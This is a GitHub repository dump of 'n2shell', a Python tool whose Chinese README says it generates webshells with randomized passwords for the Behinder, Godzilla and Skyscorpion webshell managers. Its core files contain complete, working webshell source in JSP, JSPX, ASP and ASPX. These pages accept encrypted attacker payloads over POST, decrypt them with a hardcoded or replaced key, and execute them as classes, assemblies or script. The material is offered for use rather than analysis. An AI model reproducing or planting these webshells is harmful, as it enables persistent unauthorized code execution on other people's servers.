├── .gitignore ├── LICENSE ├── README.assets ├── image-20220120152449149.png ├── image-20220120153238409.png ├── image-20220120153501483.png ├── image-20220120154108798.png ├── image-20220120154130290.png └── image-20220120154216873.png ├── README.md ├── core ├── bx.py ├── cv.py ├── gsl.py └── tx.py ├── doc └── images │ └── logo.png └── main.py /.gitignore: -------------------------------------------------------------------------------- 1 | .DS_Store 2 | __pycache__ 3 | *.log -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2021 0x727 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.assets/image-20220120152449149.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0x727/n2shell/9795fa30edcd441b12bac5e8c0800e79e6d7d21f/README.assets/image-20220120152449149.png -------------------------------------------------------------------------------- /README.assets/image-20220120153238409.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0x727/n2shell/9795fa30edcd441b12bac5e8c0800e79e6d7d21f/README.assets/image-20220120153238409.png -------------------------------------------------------------------------------- /README.assets/image-20220120153501483.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0x727/n2shell/9795fa30edcd441b12bac5e8c0800e79e6d7d21f/README.assets/image-20220120153501483.png -------------------------------------------------------------------------------- /README.assets/image-20220120154108798.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0x727/n2shell/9795fa30edcd441b12bac5e8c0800e79e6d7d21f/README.assets/image-20220120154108798.png -------------------------------------------------------------------------------- /README.assets/image-20220120154130290.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0x727/n2shell/9795fa30edcd441b12bac5e8c0800e79e6d7d21f/README.assets/image-20220120154130290.png -------------------------------------------------------------------------------- /README.assets/image-20220120154216873.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0x727/n2shell/9795fa30edcd441b12bac5e8c0800e79e6d7d21f/README.assets/image-20220120154216873.png -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | 2 | ![logo](./doc/images/logo.png) 3 | 4 | # n2shell 5 | 6 | [中文简体](./README_zh.md) 7 | 8 | | 类别 | 说明 | 9 | | ---- | --- | 10 | | 作者 | [1amfine2333](https://github.com/1amfine2333) | 11 | | 团队 | [0x727](https://github.com/0x727) 未来一段时间将陆续开源工具 | 12 | | 定位 | 解决下意识使用默认密码webshell的问题 | 13 | | 语言 | Python | 14 | | 功能 | 生成随机密码的webshell | 15 | 16 | 17 | ## 项目说明 18 | 19 | 解决重复使用默认密码webshell的问题 20 | 21 | ## 什么是 n2shell ? 22 | 23 | 解决重复使用默认密码webshell的问题,快速生成所需要的websehll 24 | 25 | ## n2shell 的原理? 26 | 27 | 就是替换字符串,将webshell的默认密码替换成随机的字符串 28 | 29 | ![image-20220120152449149](README.assets/image-20220120152449149.png) 30 | 31 | ## 快速开始体验 32 | 33 | ### 1. Git下载 34 | 35 | ```bash 36 | $ git clone https://github.com/0x727/n2shell.git 37 | ``` 38 | 39 | > 注意事项:使用者本机需要已经安装Python3环境 40 | 41 | ## 使用方法 42 | 43 | 1. 生成冰蝎的php 44 | 45 | ```bash 46 | $ python3 main.py php bx 47 | ``` 48 | 49 | ![image-20220120154130290](README.assets/image-20220120154130290.png) 50 | 51 | 2. 生成哥斯拉的jspx 52 | 53 | ```bash 54 | $ python3 main.py jspx gsl 55 | ``` 56 | 57 | ![image-20220120154108798](README.assets/image-20220120154108798.png) 58 | 59 | > 这个环节主要是为了帮助使用者快速上手当前项目,参数较多的可以用表格展示 60 | 61 | 注: 62 | 63 | 参数1为webshell类型: 64 | 65 | ![image-20220120153238409](README.assets/image-20220120153238409.png) 66 | 67 | 参数2为webshell管理器,支持自定义别名(不传入时,默认为bx即冰蝎) 68 | 69 | ![image-20220120153501483](README.assets/image-20220120153501483.png) 70 | 71 | ![image-20220120154216873](README.assets/image-20220120154216873.png) 72 | 73 | ## TODO 74 | 75 | ```css 76 | - [ ] 混淆其它的函数名 77 | - [ ] 待添加 78 | ``` 79 | 80 | ## 为 n2shell 做贡献 81 | 82 | n2shell是一个免费且开源的项目,我们欢迎任何人为其开发和进步贡献力量。 83 | 84 | - 在使用过程中出现任何问题,可以通过 issues 来反馈。 85 | - Bug 的修复可以直接提交 Pull Request 到 dev 分支。 86 | - 如果是增加新的功能特性,请先创建一个 issue 并做简单描述以及大致的实现方法,提议被采纳后,就可以创建一个实现新特性的 Pull Request。 87 | - 欢迎对说明文档做出改善,帮助更多的人使用 n2shell,特别是英文文档。 88 | - 贡献代码请提交 PR 至 dev 分支,master 分支仅用于发布稳定可用版本。 89 | - 如果你有任何其他方面的问题或合作,欢迎发送邮件至 0x727Team@gmail.com 。 90 | 91 | > 提醒:和项目相关的问题最好在 issues 中反馈,这样方便其他有类似问题的人可以快速查找解决方法,并且也避免了我们重复回答一些问题。 92 | -------------------------------------------------------------------------------- /core/bx.py: -------------------------------------------------------------------------------- 1 | import core.cv as cv 2 | 3 | def r(one,r1): 4 | return one.replace("e45e329feb5d925b", r1) 5 | 6 | def get(type,pwd_md5): 7 | print("Behinder_v3.0.11【t00ls专版】\nhttps://github.com/rebeyond/Behinder\n"+"-"*64) 8 | if type == "jsp": 9 | print(r(jsp,pwd_md5)) 10 | elif type == "jspx": 11 | print(r(jspx,pwd_md5)) 12 | elif type == "php": 13 | print(r(php,pwd_md5)) 14 | elif type == "asp": 15 | print(r(asp,pwd_md5)) 16 | elif type == "aspx" or type == ".net" or type == "c#": 17 | print(r(aspx,pwd_md5)) 18 | 19 | 20 | jsp = '''shell.jsp\n\n<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%> 21 | ---------------------------------------------------------------- 22 | shell_java9.jsp\n\n<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(Base64.getDecoder().decode(request.getReader().readLine()))).newInstance().equals(pageContext);}%>''' 23 | 24 | jspx = '''shell.jspx\n\n class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}String k="e45e329feb5d925b";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);''' 25 | 26 | asp = '''shell.asp\n\n<% 27 | Response.CharSet = "UTF-8" 28 | k="e45e329feb5d925b" 29 | Session("k")=k 30 | size=Request.TotalBytes 31 | content=Request.BinaryRead(size) 32 | For i=1 To size 33 | result=result&Chr(ascb(midb(content,i,1)) Xor Asc(Mid(k,(i and 15)+1,1))) 34 | Next 35 | execute(result) 36 | %>''' 37 | 38 | php = '''shell.php\n\n''' 64 | 65 | aspx = '''shell.aspx\n\n<%@ Page Language="C#" %><%@Import Namespace="System.Reflection"%><%Session.Add("k","e45e329feb5d925b"); byte[] k = Encoding.Default.GetBytes(Session[0] + ""),c = Request.BinaryRead(Request.ContentLength);Assembly.Load(new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(k, k).TransformFinalBlock(c, 0, c.Length)).CreateInstance("U").Equals(this);%>''' 66 | 67 | -------------------------------------------------------------------------------- /core/cv.py: -------------------------------------------------------------------------------- 1 | import random,hashlib 2 | 3 | def grs(randomlength=10):#https://blog.csdn.net/hefener/article/details/109725477 generate_random_str 4 | random_str = '' 5 | base_str = 'ABCDEFGHIGKLMNOPQRSTUVWXYZabcdefghigklmnopqrstuvwxyz0123456789' 6 | length = len(base_str) - 1 7 | for i in range(randomlength): 8 | random_str += base_str[random.randint(0, length)] 9 | return random_str 10 | 11 | def cmd5(message):#https://blog.csdn.net/weixin_44799217/article/details/112486097 computeMD5 12 | m = hashlib.md5() 13 | m.update(message.encode(encoding='utf-8')) 14 | return m.hexdigest() -------------------------------------------------------------------------------- /core/gsl.py: -------------------------------------------------------------------------------- 1 | import core.cv as cv 2 | 3 | def r(one,r1,r2): 4 | r2 = cv.cmd5(r2)[0:16] 5 | return one.replace('"pass"','"'+r1+'"').replace("3c6e0b8a9c15224a", r2) 6 | 7 | def get(type,pwd,key): 8 | print("godzilla-v4.0.1 \nhttps://github.com/shack2/skyscorpion\n"+"-"*64) 9 | if type == "jsp": 10 | print(r(jsp,pwd,key)) 11 | elif type == "jspx": 12 | print(r(jspx,pwd,key)) 13 | elif type == "php": 14 | print(r(php,pwd,key)) 15 | elif type == "asp": 16 | print(r(asp,pwd,key)) 17 | elif type == "aspx" or type == ".net" or type == "c#": 18 | print(r(aspx,pwd,key)) 19 | 20 | jsp='''JAVA_AES_BASE64.jsp\n\n<%! String xc="3c6e0b8a9c15224a"; String pass="pass"; String md5=md5(pass+xc); class X extends ClassLoader{public X(ClassLoader z){super(z);}public Class Q(byte[] cb){return super.defineClass(cb, 0, cb.length);} }public byte[] x(byte[] s,boolean m){ try{javax.crypto.Cipher c=javax.crypto.Cipher.getInstance("AES");c.init(m?1:2,new javax.crypto.spec.SecretKeySpec(xc.getBytes(),"AES"));return c.doFinal(s); }catch (Exception e){return null; }} public static String md5(String s) {String ret = null;try {java.security.MessageDigest m;m = java.security.MessageDigest.getInstance("MD5");m.update(s.getBytes(), 0, s.length());ret = new java.math.BigInteger(1, m.digest()).toString(16).toUpperCase();} catch (Exception e) {}return ret; } public static String base64Encode(byte[] bs) throws Exception {Class base64;String value = null;try {base64=Class.forName("java.util.Base64");Object Encoder = base64.getMethod("getEncoder", null).invoke(base64, null);value = (String)Encoder.getClass().getMethod("encodeToString", new Class[] { byte[].class }).invoke(Encoder, new Object[] { bs });} catch (Exception e) {try { base64=Class.forName("sun.misc.BASE64Encoder"); Object Encoder = base64.newInstance(); value = (String)Encoder.getClass().getMethod("encode", new Class[] { byte[].class }).invoke(Encoder, new Object[] { bs });} catch (Exception e2) {}}return value; } public static byte[] base64Decode(String bs) throws Exception {Class base64;byte[] value = null;try {base64=Class.forName("java.util.Base64");Object decoder = base64.getMethod("getDecoder", null).invoke(base64, null);value = (byte[])decoder.getClass().getMethod("decode", new Class[] { String.class }).invoke(decoder, new Object[] { bs });} catch (Exception e) {try { base64=Class.forName("sun.misc.BASE64Decoder"); Object decoder = base64.newInstance(); value = (byte[])decoder.getClass().getMethod("decodeBuffer", new Class[] { String.class }).invoke(decoder, new Object[] { bs });} catch (Exception e2) {}}return value; }%><%try{byte[] data=base64Decode(request.getParameter(pass));data=x(data, false);if (session.getAttribute("payload")==null){session.setAttribute("payload",new X(this.getClass().getClassLoader()).Q(data));}else{request.setAttribute("parameters",data);java.io.ByteArrayOutputStream arrOut=new java.io.ByteArrayOutputStream();Object f=((Class)session.getAttribute("payload")).newInstance();f.equals(arrOut);f.equals(pageContext);response.getWriter().write(md5.substring(0,16));f.toString();response.getWriter().write(base64Encode(x(arrOut.toByteArray(), true)));response.getWriter().write(md5.substring(16));} }catch (Exception e){} 21 | %>''' 22 | jspx='''JAVA_AES_BASE64.jspx\n\n String xc="3c6e0b8a9c15224a"; String pass="pass"; String md5=md5(pass+xc); class X extends ClassLoader{public X(ClassLoader z){super(z);}public Class Q(byte[] cb){return super.defineClass(cb, 0, cb.length);} }public byte[] x(byte[] s,boolean m){ try{javax.crypto.Cipher c=javax.crypto.Cipher.getInstance("AES");c.init(m?1:2,new javax.crypto.spec.SecretKeySpec(xc.getBytes(),"AES"));return c.doFinal(s); }catch (Exception e){return null; }} public static String md5(String s) {String ret = null;try {java.security.MessageDigest m;m = java.security.MessageDigest.getInstance("MD5");m.update(s.getBytes(), 0, s.length());ret = new java.math.BigInteger(1, m.digest()).toString(16).toUpperCase();} catch (Exception e) {}return ret; } public static String base64Encode(byte[] bs) throws Exception {Class base64;String value = null;try {base64=Class.forName("java.util.Base64");Object Encoder = base64.getMethod("getEncoder", null).invoke(base64, null);value = (String)Encoder.getClass().getMethod("encodeToString", new Class[] { byte[].class }).invoke(Encoder, new Object[] { bs });} catch (Exception e) {try { base64=Class.forName("sun.misc.BASE64Encoder"); Object Encoder = base64.newInstance(); value = (String)Encoder.getClass().getMethod("encode", new Class[] { byte[].class }).invoke(Encoder, new Object[] { bs });} catch (Exception e2) {}}return value; } public static byte[] base64Decode(String bs) throws Exception {Class base64;byte[] value = null;try {base64=Class.forName("java.util.Base64");Object decoder = base64.getMethod("getDecoder", null).invoke(base64, null);value = (byte[])decoder.getClass().getMethod("decode", new Class[] { String.class }).invoke(decoder, new Object[] { bs });} catch (Exception e) {try { base64=Class.forName("sun.misc.BASE64Decoder"); Object decoder = base64.newInstance(); value = (byte[])decoder.getClass().getMethod("decodeBuffer", new Class[] { String.class }).invoke(decoder, new Object[] { bs });} catch (Exception e2) {}}return value; }try{byte[] data=base64Decode(request.getParameter(pass));data=x(data, false);if (session.getAttribute("payload")==null){session.setAttribute("payload",new X(this.getClass().getClassLoader()).Q(data));}else{request.setAttribute("parameters",data);java.io.ByteArrayOutputStream arrOut=new java.io.ByteArrayOutputStream();Object f=((Class)session.getAttribute("payload")).newInstance();f.equals(arrOut);f.equals(pageContext);response.getWriter().write(md5.substring(0,16));f.toString();response.getWriter().write(base64Encode(x(arrOut.toByteArray(), true)));response.getWriter().write(md5.substring(16));} }catch (Exception e){} 23 | ''' 24 | php='''PHP_EVAL_XOR_BASE4.php\n\n 28 | ''' 29 | aspx='''CSHAP_AES_BASE64.aspx\n\n<%@ Page Language="C#"%><%try { string key = "3c6e0b8a9c15224a"; string pass = "pass"; string md5 = System.BitConverter.ToString(new System.Security.Cryptography.MD5CryptoServiceProvider().ComputeHash(System.Text.Encoding.Default.GetBytes(pass + key))).Replace("-", ""); byte[] data = System.Convert.FromBase64String(Context.Request[pass]); data = new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(System.Text.Encoding.Default.GetBytes(key), System.Text.Encoding.Default.GetBytes(key)).TransformFinalBlock(data, 0, data.Length); if (Context.Session["payload"] == null) { Context.Session["payload"] = (System.Reflection.Assembly)typeof(System.Reflection.Assembly).GetMethod("Load", new System.Type[] { typeof(byte[]) }).Invoke(null, new object[] { data }); ; } else { System.IO.MemoryStream outStream = new System.IO.MemoryStream(); object o = ((System.Reflection.Assembly)Context.Session["payload"]).CreateInstance("LY"); o.Equals(Context); o.Equals(outStream); o.Equals(data); o.ToString(); byte[] r = outStream.ToArray(); Context.Response.Write(md5.Substring(0, 16)); Context.Response.Write(System.Convert.ToBase64String(new System.Security.Cryptography.RijndaelManaged().CreateEncryptor(System.Text.Encoding.Default.GetBytes(key), System.Text.Encoding.Default.GetBytes(key)).TransformFinalBlock(r, 0, r.Length))); Context.Response.Write(md5.Substring(16)); } } catch (System.Exception) { } 30 | %>''' -------------------------------------------------------------------------------- /core/tx.py: -------------------------------------------------------------------------------- 1 | import core.cv as cv 2 | 3 | def r(one,r1,r2): 4 | return one.replace("sky",r1).replace("900bc885d7553375", r2) 5 | 6 | def get(type,pwd,pwd_md5): 7 | print("skyscorpion_20211122 \nhttps://github.com/shack2/skyscorpion\n"+"-"*64) 8 | if type == "jsp": 9 | print(r(jsp,pwd,pwd_md5)) 10 | elif type == "jspx": 11 | print(r(jspx,pwd,pwd_md5)) 12 | elif type == "php": 13 | print(r(php,pwd,pwd_md5)) 14 | elif type == "asp": 15 | print(r(asp,pwd,pwd_md5)) 16 | elif type == "aspx" or type == ".net" or type == "c#": 17 | print(r(aspx,pwd,pwd_md5)) 18 | 19 | jsp='''api_all_jdk.jsp\n\n<%@page import="java.util.*,java.io.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader { 20 | U(ClassLoader c) { 21 | super(c); 22 | } 23 | public Class g(byte[] b) { 24 | return super.defineClass(b, 0, b.length); 25 | } 26 | }%> 27 | <% 28 | try{ 29 | String key="900bc885d7553375"; 30 | request.setAttribute("sky", key); 31 | String data=request.getReader().readLine(); 32 | if (data!= null) { 33 | String ver = System.getProperty("java.version"); 34 | byte[] code=null; 35 | if (ver.compareTo("1.8") >= 0) { 36 | Class Base64 = Class.forName("java.util.Base64"); 37 | Object Decoder = Base64.getMethod("getDecoder", (Class[]) null).invoke(Base64, (Object[]) null); 38 | code = (byte[]) Decoder.getClass().getMethod("decode", new Class[]{byte[].class}).invoke(Decoder, new Object[]{data.getBytes("UTF-8")}); 39 | } else { 40 | Class Base64 = Class.forName("sun.misc.BASE64Decoder"); 41 | Object Decoder = Base64.newInstance(); 42 | code = (byte[]) Decoder.getClass().getMethod("decodeBuffer", new Class[]{String.class}).invoke(Decoder, new Object[]{data}); 43 | } 44 | Cipher c = Cipher.getInstance("AES"); 45 | c.init(2, new SecretKeySpec(key.getBytes(), "AES")); 46 | new U(this.getClass().getClassLoader()).g(c.doFinal(code)).newInstance().equals(pageContext); 47 | } 48 | }catch(Exception e){ 49 | }; 50 | out=pageContext.pushBody(); 51 | %>''' 52 | jspx='''api_all_jdk.jspx\n\n 53 | 54 | class U extends ClassLoader { 55 | U(ClassLoader c) { 56 | super(c); 57 | } 58 | public Class g(byte[] b) { 59 | return super.defineClass(b, 0, b.length); 60 | } 61 | } 62 | 63 | 64 | try{ 65 | String key="900bc885d7553375"; 66 | request.setAttribute("sky", key); 67 | String data=request.getReader().readLine(); 68 | if (data!= null) { 69 | String ver = System.getProperty("java.version"); 70 | byte[] code=null; 71 | if (ver.compareTo("1.8") >= 0) { 72 | Class Base64 = Class.forName("java.util.Base64"); 73 | Object Decoder = Base64.getMethod("getDecoder", (Class[]) null).invoke(Base64, (Object[]) null); 74 | code = (byte[]) Decoder.getClass().getMethod("decode", new Class[]{byte[].class}).invoke(Decoder, new Object[]{data.getBytes("UTF-8")}); 75 | } else { 76 | Class Base64 = Class.forName("sun.misc.BASE64Decoder"); 77 | Object Decoder = Base64.newInstance(); 78 | code = (byte[]) Decoder.getClass().getMethod("decodeBuffer", new Class[]{String.class}).invoke(Decoder, new Object[]{data}); 79 | } 80 | Cipher c = Cipher.getInstance("AES"); 81 | c.init(2, new SecretKeySpec(key.getBytes(), "AES")); 82 | new U(this.getClass().getClassLoader()).g(c.doFinal(code)).newInstance().equals(pageContext); 83 | } 84 | }catch(Exception e){ 85 | }; 86 | 87 | ''' 88 | php='''api.php\n\n''' 112 | asp='''api.asp\n\n<% 113 | On Error Resume Next 114 | Response.CharSet = "UTF-8" 115 | k="900bc885d7553375" 116 | Session("k")=k 117 | size=Request.TotalBytes 118 | csize=Request.ServerVariables("HTTP_CSIZE") 119 | If IsEmpty(csize)=False Then 120 | size=CLng(csize) 121 | End If 122 | If size>0 Then 123 | content=Request.BinaryRead(size) 124 | For i=1 To size 125 | result=result&Chr(ascb(midb(content,i,1)) Xor Asc(Mid(k,(i and 15)+1,1))) 126 | Next 127 | execute(result) 128 | End If 129 | %>''' 130 | aspx='''api.aspx\n\n<%@ Page Language="C#" %> 131 | <%@Import Namespace="System.Reflection"%> 132 | <%@Import Namespace="System.IO"%> 133 | <% 134 | try { 135 | string key = "900bc885d7553375"; 136 | byte[] k = Encoding.Default.GetBytes(key); 137 | Session.Add("sky", key); 138 | StreamReader sr = new StreamReader(Request.InputStream); 139 | string line = sr.ReadLine(); 140 | if (!string.IsNullOrEmpty(line)) 141 | { 142 | byte[] c = Convert.FromBase64String(line); 143 | Assembly.Load(new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(k, k).TransformFinalBlock(c, 0, c.Length)).CreateInstance("U").Equals(this.Context); 144 | sr.Close(); 145 | } 146 | } 147 | catch{ } 148 | 149 | %>''' -------------------------------------------------------------------------------- /doc/images/logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0x727/n2shell/9795fa30edcd441b12bac5e8c0800e79e6d7d21f/doc/images/logo.png -------------------------------------------------------------------------------- /main.py: -------------------------------------------------------------------------------- 1 | import sys,os 2 | from datetime import datetime 3 | import core.cv as cv 4 | import core.bx as bx 5 | import core.tx as tx 6 | import core.gsl as gsl 7 | 8 | class Logger(object):#print2log https://www.cnblogs.com/henry2019/p/14313948.html 9 | def __init__(self, fileN='Default.log'): 10 | self.terminal = sys.stdout 11 | self.log = open(fileN, 'a') 12 | 13 | def write(self, message): 14 | '''print实际相当于sys.stdout.write''' 15 | self.terminal.write(message) 16 | self.log.write(message) 17 | 18 | def flush(self): 19 | pass 20 | 21 | def logo(): 22 | print(''' 23 | | \ | |__ \ | | | | | 24 | | \| | ) |___| |__ ___| | | 25 | | . ` | / // __| '_ \ / _ \ | | 26 | | |\ |/ /_\__ \ | | | __/ | | 27 | |_| \_|____|___/_| |_|\___|_|_| 28 | ''') 29 | 30 | shell_type = ["jsp","jspx","php","asp","aspx",".net","c#"] 31 | bx_as = ["bx","b","冰蝎","冰鞋","冰"] 32 | tx_as = ["tx","t","天蝎","天"] 33 | gsl_as = ["god","gsl","gls","gl","g","哥斯拉","Godzilla","godzilla"] 34 | default_manage = "bx" #shell管理工具,默认bx,可以修改 35 | 36 | logfolder = "log" 37 | if os.path.exists(logfolder) == False: # 判断文件夹是否存在 38 | os.mkdir(logfolder) 39 | try : 40 | logo() 41 | if len(sys.argv) == 2 and sys.argv[1] in shell_type: 42 | type = sys.argv[1] 43 | manage = default_manage 44 | print("[默认冰蝎,修改默认default_manage]\n") 45 | elif len(sys.argv) >= 3 and sys.argv[1] in shell_type and sys.argv[2] in bx_as+tx_as+gsl_as: 46 | type = sys.argv[1] 47 | manage = sys.argv[2] 48 | else: 49 | exit() 50 | 51 | sys.stdout = Logger("./log/"+manage+"_"+type+"_"+datetime.now().strftime("%Y_%m_%d_%H_%M_%S")+'.log') 52 | 53 | pwd = cv.grs() 54 | key = cv.grs() 55 | pwd_md5 = cv.cmd5(pwd)[0:16] 56 | print("pwd:"+pwd+"\nkey:"+key+"(Godzilla key)") 57 | print("pwd_md5:",pwd_md5) 58 | print("-"*64) 59 | 60 | if manage in bx_as: 61 | bx.get(type,pwd_md5) 62 | 63 | elif manage in tx_as: 64 | tx.get(type,pwd,pwd_md5) 65 | 66 | elif manage in gsl_as: 67 | gsl.get(type,pwd,key) 68 | 69 | print("-"*64) 70 | 71 | except: 72 | print(" tips: python3 main.py php") 73 | print(" shell type: "+str(shell_type)) 74 | 75 | 76 | --------------------------------------------------------------------------------